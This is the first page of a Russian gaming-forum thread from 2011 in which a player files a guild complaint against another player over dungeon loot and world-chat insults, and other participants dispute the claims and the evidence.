Четверг, 03.07.2025, 14:29
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 2
  • 1
  • 2
  • »
Архив - только для чтения
Жалоба от Xlopushka на TаnaTos
XlopushkaДата: Четверг, 20.10.2011, 07:11 | Сообщение # 1
Экселлент-пользователь
Group: Future Excellent

Flood Level: 173

Registration was: 14.05.2011
Status: Offline
1. Xlopushka Excellent
2. TаnaTos без клана
3. Вар TаnaTos кинул пати в гуе на грибы. На последнем боссе я вылетела в истоки. Пати добила босса и 3 перса вышли за мной в истоки. Вар TаnaTos и дру остались в гуе разбили грибы.
http://s59.radikal.ru/i165/1110/94/e1a142715ded.jpg
http://s017.radikal.ru/i425/1110/ab/e519a4c76410.jpg
http://s07.radikal.ru/i180/1110/ee/7a7a3dbe6b2a.jpg
http://s017.radikal.ru/i438/1110/c2/fb7969c81f7f.jpg
http://s40.radikal.ru/i090/1110/4b/d40c573e4a41.jpg
http://s017.radikal.ru/i411/1110/4d/af9a308bb24f.jpg
скрины оскорблений в мир были сделаны подругой т.к. к тому моменту этот персонаж находился уже у меня в ЧС
http://s53.radikal.ru/i140/1110/f3/4776f159fc42.jpg
http://s44.radikal.ru/i106/1110/15/7131b1ccc606.jpg
4. внесение персонажа в кос лист гильдии

</a><script type="text/javascript" src="http://flines.ru/timelinejs/1058658.js"></script>

En la gloria Excellent!

Сообщение отредактировал Xlopushka - Четверг, 20.10.2011, 07:27

TWOHKДата: Четверг, 20.10.2011, 10:22 | Сообщение # 2
n00b
Group: Пользователи

Flood Level: 7

Registration was: 30.09.2011
вмешаюсь как непосредственный участник событий.
Итак, во первых кидалова со стороны Танатоса не было
во вторых тобой принципиально была проигнорирована попытка мирного выяснения события и, даже, провоцирован конфликт
но начну с начала. За гуй был целый ряд неприятных прецендентов которые 3 раза каночились попыткой ухода хлопушки с пати с пати и на 4 раз ты таки вышла. На середине 9 боса Хлопушка умерла и вылетела в куб. Прозвучала речь на предмет что надо будет после боса ее забрать. После боса я и 2 лука вышли в ги. Друля, с которой был конфликт у меня и Хлопушки, выходить не стала, стоял там и Танатос (мы все в РК сидели и думали не побьет ли дру грибы, натура там это допускала). В итоге грибы были разбиты, Танатосу упали все значимые камни, через секунду Хлопушка выщла с пати. На вопрос танатоса "стоп, а что случилось" прозвучал мой ответ "ну как бы ты кинул пати на камни". Танатос (напомню что сремя было 6-30 утра)тут же ответил "как это?" а поняв в чем суть тут же сказал "продаем и делим по ровну". Хлопушке об этом было сказано. В ответ она начала писать в мир сообщения порочащие танатоса. на дальнейшие попытки поговорить продолжала хаять в мир. Общалась она с Танатосом и в скайпе. Я не знаю как там сложился разговор, но я более чем уверен (уверенность основана на опыте общения с танатосом) что либо хлопушкой были отвергнуты вообще все способы улаживания конфликта, либо они были не приемлимы по сути. Вернулся в РК из скайпа Танатос злой и на взводе типа "сам же ее позвал, столько ее знаю, не ожидал ну она и тварь" (извините из песни слов не выбросишь).

собственно встречная претензия
до входа в гуй была речь о том что надо помочь с босами по 3 моли, подозреваю что по этому поводу вин скидывал тебе ГСН-ки... на 9 босе ты пробовала съехать на тему "нет маны" тебе пообещали хиру.. в итоге ты ушла с пати не прощаясь. (кинув как минимум вина на ГСН)
и, как банк, тех самых, якобы украденных камней, информирую что стоимость услуги левого приста я вычту с твоей доли в пользу вина а там более чем по 1,5кк на человека так что покрыть хватит.. даже тебе малость останется

Таким образом вопрос о недостойном поведении Хлопушки оставляю на ваше усмотрение, а вопрос о косе Танатоса прошу перевести в обсуждаемое русло, так как данный мембер является членом нашей ги

хочется обратить внимание на явную пусть мелкую но лож со стороны хлопушки. Она утверждает что к моменту 2 последних скринов танатос в косе и бодро реагирует в мир на его вопрос о клане в мир... интересно откуда она не видя его сообщений знает что он вступит в клан и даже отвечает через буквально пару секунд еще и цитированием его текста и соблюдением стиля ника? (то что это несколько секунгд видно из групп разговора подружки)

Сообщение отредактировал TWOHK - Четверг, 20.10.2011, 10:42

XlopushkaДата: Четверг, 20.10.2011, 14:10 | Сообщение # 3
Экселлент-пользователь

Уважаемый TWOHK мирного урегулирования вопроса не было, даже попыткию или вы считаете разговор попыткой, но все слова со стороны Сергея в нем можно заменить звездами.
Во первых с этим персонажем мы всегда были в дружеских отношениях и если уж такое произошло он мне мог спокойно позвонить по скайпу и все обьяснить, чего он не сделал, тем более в разговоре в скайпе я от него услышала неадекватные выражения в мою сторону.
Во-вторых те сообщения которые он писал я не видела мне предал в разговоре по скайпу маршал клана Респектум в ктором он на тот момент находился.И я неоднократно слышала о неадекватности этого игрока от руководства его бывшего клана в котором у него постоянно были конфликты.
В-третьих когда я вышла из пати мне ник-то из вас не написал и ничего не сказал хотя я 2 часа провела в городе Истоков пытаясь понять что произошло. На скринах видно как Тонатаос прощается с пати и начинает поднимать лут. Согласитесь, что тот конфликт который произошел в гуе с друлей начала не я, моя задача была ее успокоить и не дать наезжать на пати в итоге я осталась еще и виновата.
Ио каких попытках выхода из гуя вы говорите, моя задача была успокоить и привести в чувтво друлю которая очень некорректоно отзывалась в мою сторону. http://s012.radikal.ru/i321/1110/3d/63e4a2965085.jpg
так что уважаемый TWOHK я буду и дальше настаивать о внесении в кос данного персонажа. хотя мне это ситуция очень неприятна , ведь с Сергеем мы очень долгое время были в дружесских отношениях.

</a><script type="text/javascript" src="http://flines.ru/timelinejs/1058658.js"></script>

En la gloria Excellent!

Сообщение отредактировал Xlopushka - Четверг, 20.10.2011, 14:25

МилочкаДата: Четверг, 20.10.2011, 14:33 | Сообщение # 4
Начинающий флудер
Group: Ex-Excellent

Flood Level: 427

Registration was: 19.11.2010
TWOHK, у TаnaTos есть скриншоты или любые другие доказательства того, что он пытался урегулировать вопрос мирно? Когда это вам нужно мы все всегда белые и пушистые, а вот на самом деле?
В данном случае, по скриншотам Xlopushka видно, что он действительно поднимает лут с "грибочков", после чего от игрока под ником TаnaTos в мире появляются оскорбления.Сама Xlopushka судя по скриншотам фактически не оскорбляла, ну если только слово "нубас".
Quote (TWOHK)
собственно встречная претензия
до входа в гуй была речь о том что надо помочь с босами по 3 моли, подозреваю что по этому поводу вин скидывал тебе ГСН-ки... на 9 босе ты пробовала съехать на тему "нет маны" тебе пообещали хиру.. в итоге ты ушла с пати не прощаясь. (кинув как минимум вина на ГСН)
и, как банк, тех самых, якобы украденных камней, информирую что стоимость услуги левого приста я вычту с твоей доли в пользу вина а там более чем по 1,5кк на человека так что покрыть хватит.. даже тебе малость останется

Если у Вас есть претензия или жалоба, то оформите ее соответствующим образом, а не просто пропишите в другой теме (в данном случае Вы прописываете ее в этой), и потрудитесь приложить скриншоты.

Уровень репутации был повышен [+1].
Добавил: 3ВЕРb
Комментарий: повелительнице котов!!!

XlopushkaДата: Четверг, 20.10.2011, 14:44 | Сообщение # 5
Экселлент-пользователь

Quote (Милочка)

До входа в гуй мне ник-то не сказал что нужно помочь с боссом, не посредственно я об этом узнала уже в гуе когда начался конфликт с друидом. Вин попросил не запарывать гуй т.к ему нужен фулл и последний босс. А попводу гсн когда он первый раз скинул и пати все полняло я в ПМ у него спросила не нужны они ему, он сказал что нет и я попросила скидывать мне. Договора что за ГСН я помогу с боссом не было!!!!

En la gloria Excellent!

МилочкаДата: Четверг, 20.10.2011, 14:47 | Сообщение # 6
Начинающий флудер
Group: Ex-Excellent

Flood Level: 427

Registration was: 19.11.2010
Xlopushka, пожалуйста, воздержись от флуда, если такая претензия от TWOHK есть, то пусть оформляет, я ее рассматривать буду отдельно. Уж точно не здесь.

Уровень репутации был повышен [+1].
Добавил: 3ВЕРb
Комментарий: повелительнице котов!!!

TWOHKДата: Четверг, 20.10.2011, 15:39 | Сообщение # 7
n00b

и так. Отвечаю по порядку и всем.
Хлопушка. Если ты долго общаешься с Сергеем то знаешь ряд нюансов его поведения.
1) он бывает нубит, но не кидает.. пример: нечайно на 8 босе передал ПЛ магу пытаясь взять с него асист (нубяра). итог - компенсация по 1 китаю всем членам пати
2) я не знаю что было у вас в скайпе, меня там не было... знаю что он шел туда извиниться и объяснить и вернуть тебя в пати, но с какой цитатой вернулся читай выше
3) что до конфликта с дру то там я не буду спорить кто виноват )) это вставлено для иллюстрации 2 моментов. первый - ты готова в случае конфликта не взирая ни на что выйти с пати. второе ( и главное) - был серьезный повод думать что при выходе дру скрысит грибы (ибо не мне тебе рассказывать как вела себя дру)
4) лично я тебе писал "сергей не кидок, он нубас, весь дроп делим, хватит устраивать истерику" или не было такого? и что ты мне ответила? вспоминай
5) на тему 3 моли.. можно долго спрорить, можно просто дожаться вина, а можно просто забыть (при условии мирного решения конфликта с Таном)
Милочка
претензий к клану экселент нет и быть не может ибо то что случилось я считал (и считаю) бытовым недопониманием между пати (кстати отсюда единственные скрины у меня только дропа и состава пати, дабы не забыть кому и сколько). И, для меня, стало полной неожиданностью что это может быть вопросом о занесении в кос.
Так и стоит понимать реплику что о моральном поведении хлопушки решайте сами, исходя из своего мнения, а кос Танатоса перевести в область обсуждения и штатного решения вопроса (я не вижу вины тана, во всяком случае не больше чем хлопушки, и единственный вопрос (с моей точки зрения) состоит в том что надо просто поделить дроп к общему удовольствию)
что касается Мир чата...
по цитатам (не на все есть скрины) неоднократные надписи "Танатос кидок", "танатос позор", ну и реплика на скрине
ответы "не ожидал что ты такая тварь", "не ожидал что ты такая мразь", "ты животное"
мата не было ни с той стороны ни с той... опять таки можно спорить что круче "животное" или "кидок", можно опять таки спорить что было в скайпе.. лично я считаю что не правы оба и оба вели себя, скажем, "с горяча".. так что еще раз повторюсь... не было НЕСПРОВАЦИРОВАННОГО конфликта.. оба хороши и вопрос надо просто решать полюбовно
что до белого и пушистого... ну далеко не всегда так... как и у вас.. когда меня (белого) слили - вы оплатили требование. Сейчас белых нет, но это же не повод для ссоры? тем более что мы (не знаю как вы) считаем что данный конфликт можно разумно решить
да.. чтобы не было вопросов выступаю в 3 ролях
1) как свидетель
2) как помошник дипломата клана витязи
3) как банк дропа с гуя (обсуждаемая сумма чуть более 9кк на пати, состоит из 1 рубинки8, 2 сапфиров8, 1 топаза8, 1 янтаря9. было еще 3 яшмы8, но их решено не делить)

Сообщение отредактировал TWOHK - Четверг, 20.10.2011, 16:43

TWOHKДата: Четверг, 20.10.2011, 17:30 | Сообщение # 8
n00b

кстати.. я вот тут подумал.. есть устав (ваш) который все и решит
обязано ли пати, в случае вылета из гуя другого игрока, перезайти через ги чтобы дать возможность вылетевшему поучаствовать в дропе с грибов? и где это прописано?
согласно вашему уставу "За оскорбление,унижение игрока(ов) - Штраф 1 голд" как вы смотрите мир обвинение в кидалове (на тот момент не доказанное) является унижением? имхо - да. Мразь оскорбление? тоже имхо да.. одно на другое сложится?
чувствует ли ГИ себя в правде за равные провинности по разному наказывать своего мембера и чужого? или стандарт один?

XlopushkaДата: Четверг, 20.10.2011, 18:01 | Сообщение # 9
Экселлент-пользователь

TWOHK, предоставь скрины , а то я тоже много рассказать могу

En la gloria Excellent!

СонечкaДата: Четверг, 20.10.2011, 21:08 | Сообщение # 10
n00b

Flood Level: 5

Registration was: 20.10.2011
Добрый вечер! Я конечно не была в данный момент, но я никак не могу понять почему виноват именно ТанаТос? Где такие доказательства?
Quote (Xlopushka)
На последнем боссе я вылетела в истоки. Пати добила босса и 3 перса вышли за мной в истоки. Вар TаnaTos и дру остались в гуе разбили грибы.

В Гуе остались ДРУ и ВАР.... Как я поняла выше, был конфликт с дру, почему не она разбила и подняла, но все досталось вару? где 100% уверенность в том что именно вар кинул ведь лут падает рандомно?
Я не раз ходила с этим варом и все было отлично.
Еще интересен 1 момент, зачем выходить из пати не выяснив например кто и почему разбил грибы, а просто сразу же делать скрин и лететь на сайт?

• Страница 1 из 2
  • 1
  • 2
  • »
Поиск: